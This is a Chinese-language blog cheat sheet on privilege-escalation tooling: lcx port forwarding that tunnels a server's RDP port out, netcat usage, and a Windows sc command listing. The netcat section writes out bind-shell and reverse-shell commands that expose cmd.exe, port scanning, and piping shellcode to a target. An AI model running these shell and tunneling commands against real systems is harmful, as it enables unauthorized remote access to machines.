zoukankan      html  css  js  c++  java
  • cmd+lcx+nc+sc提权工具总结

    cmd:执行命令的载体cmdshell

    lcx:端口映射工具

    1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口

    2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口

    3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器

    nc:监听工具

    A:基本用法

    1.连接到REMOTE主机

    格式:nc.exe -nvv 192.168.2.2 80

    讲解:连到192.168.2.2的TCP80端口

    2.监听LOCAL主机

    格式:nc -l -p 80

    讲解:监听本机的TCP80端口

    3.扫描REMOTE主机

    格式:nc -nvv -w2 -z 192.168.2.2 80-445

    讲解:扫描192.168.2.2的TCP80到TCP445的所有端口

    4.REMOTE主机绑定SHELL

    格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe

    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

    5.REMOTE主机绑定SHELL并反向连接

    格式:nc -t -e c:winntsystem32cmd.exe 192.168.2.2 5354

    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.2.2的TCP5354端口 

    B:高级用法

    6.作攻击程序用

    格式1:type.exe c:exploit.txt|nc -nvv 192.168.2.2 80

    格式2:nc -nvv 192.168.2.2 80

    讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:ex ploit.txt'的内容(两种格式确有相同的效果, 真是有异曲同工之妙:P) 附:'c:exploit.txt'为shellcode等

    7.作蜜罐用[1]

    格式:nc -L -p 80

    讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止

    8.作蜜罐用[2]

    格式:nc -L -p 80>c:log.txt

    讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:log.txt'中,如果把'& gt;' 改为'>>'即可以追加日志 附:'c:log.txt'为日志等

    9.作蜜罐用[3]
    格式1:nc -L -p 80
    格式2:type.exe c:honeypot.txt|nc -L -p 80 ,并把'c:honeypot.txt'的内容'送'入其 管道中
     
    sc:WINNT命令(C:WINDOWSsystem32sc.exe)
    功能:

    1、SC可以 检索和设置有关服务的控制信息。可以使用 SC.exe 来测试和调试服务程序。
    2、可以设置存储在注册表中的服务属性,以控制如何在启动时启动服务应用程序,以及如何将其作为后台程序运行。即更改服务的启动状态。
    3、SC 命令还可以用来删除系统中的无用的服务。(除非对自己电脑中的软硬件所需的服务比较清楚,否则不建议删除任何系统服务,尤其是基础服务)
    4、SC命令 的参数可以配置指定的服务,检索当前服务的状态,也可以停止和启动服务(功能上类似NET STOP/START命令,但SC速度更快且能停止更多的服务)。
    5、可以创建批处理文件来调用不同的 SC 命令,以自动启动或关闭服务序列。
    SC.exe 提供的功能类似于“控制面板”中“管理工具”项中的“服务”。

    命令:

    query-----------查询服务的状态,

    或枚举服务类型的状态。

    queryex---------查询服务的扩展状态,

    或枚举服务类型的状态。

    start-----------启动服务。

    pause-----------发送 PAUSE 控制请求到服务。

    interrogate-----发送 INTERROGATE 控制请求到服务。

    continue--------发送 CONTINUE 控制请求到服务。

    stop------------发送 STOP 请求到服务。

    config----------(永久地)更改服务的配置。

    description-----更改服务的描述。

    failure---------更改服务失败时所进行的操作。

    qc--------------查询服务的配置信息。

    qdescription----查询服务的描述。

    qfailure--------查询失败服务所进行的操作。

    delete----------(从注册表)删除服务。

    create----------创建服务(将其添加到注册表)。

    control---------发送控制到服务。

    sdshow----------显示服务的安全描述符。

    sdset-----------设置服务的安全描述符。

    GetDisplayName--获取服务的 DisplayName。

    GetKeyName------获取服务的 ServiceKeyName。

    EnumDepend------枚举服务的依存关系。

    下列命令不查询服务名称:

    sc

    boot------------(ok | bad) 表明是否将上一次启动保存为

    最后所知的好的启动配置

    Lock------------锁定服务数据库

    QueryLock-------查询 SCManager 数据库的 LockStatus

    示例:

    sc start MyService

    您想查阅 QUERY 和 QUERYEX 命令的帮助吗? [ y | n ]:

    这是自带的帮助

    如果要删除一个已经存在的服务就是

    sc delete servername

  • 相关阅读:
    仿IOS中下拉刷新的“雨滴”效果
    BZOJ 4216 Pig 分块乱搞
    mybatis学习笔记(10)-一对一查询
    关于人性,我是这么看的——“唯进化”论!
    IDEA引MAVEN项目jar包依赖导入问题解决
    IntelliJ IDEA 缓存和索引介绍和清理方法
    springboot整合mybatis使用阿里(阿里连接池)和xml方式
    Intellij 如何在新窗口中打开项目
    intellij idea 在什么地方打开终端Terminal
    Spring Boot 集成MyBatis
  • 原文地址:https://www.cnblogs.com/milantgh/p/3601964.html
Copyright © 2011-2022 走看看